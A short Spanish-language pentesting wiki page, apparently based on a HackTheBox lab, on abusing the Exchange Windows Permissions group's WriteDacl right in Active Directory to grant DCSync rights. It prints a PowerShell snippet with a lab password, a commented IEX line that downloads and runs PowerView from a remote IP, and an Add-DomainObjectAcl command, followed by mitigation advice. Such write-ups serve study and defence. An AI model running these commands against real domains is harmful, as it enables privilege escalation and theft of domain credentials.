Vulnerabilidades con el grupo Exchange

Exchange Windows Permissions

La principal vulnerabilidad aquí es que Exchange tiene privilegios altos en el dominio de Active Directory. El grupo Permisos de Windows de Exchange tiene acceso WriteDacl en el objeto Dominio en Active Directory, lo que permite que cualquier miembro de este grupo modifique los privilegios del dominio, entre los que se encuentra el privilegio de realizar operaciones DCSync.

Los miembros del grupo EXCHANGE WINDOWS [email protected] tienen permisos para modificar la DACL (Discretionary Access Control List) en el dominio HTB.LOCAL.

Con acceso de escritura a la DACL del objeto de destino, puede otorgarse cualquier privilegio que desee sobre el objeto.

$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\svc-alfresco', $SecPassword)

# powershell : IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8080/PowerView.ps1')
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity x0pr4nt3s -Rights DCSync

MITIGACION:

El modelo de permiso dividido de Microsoft Exchange o la implementación de un bosque de recursos de Exchange son los mejores métodos para mitigar los ataques a AD a través de los permisos de Exchange, aunque no son fáciles de implementar o configurar (o actualizar).

Mas Informacion y mas ataques de Exchange:

Mitigating Exchange Permission Paths to Domain Admins in Active DirectoryActive Directory & Azure AD/Entra ID Security

Abusing Exchange: One API call away from Domain Admindirkjanm.io

PreviousBackup Operator NextEscalacion por Kerberos

Last updated 2 years ago

hashtagExchange Windows Permissions

Exchange Windows Permissions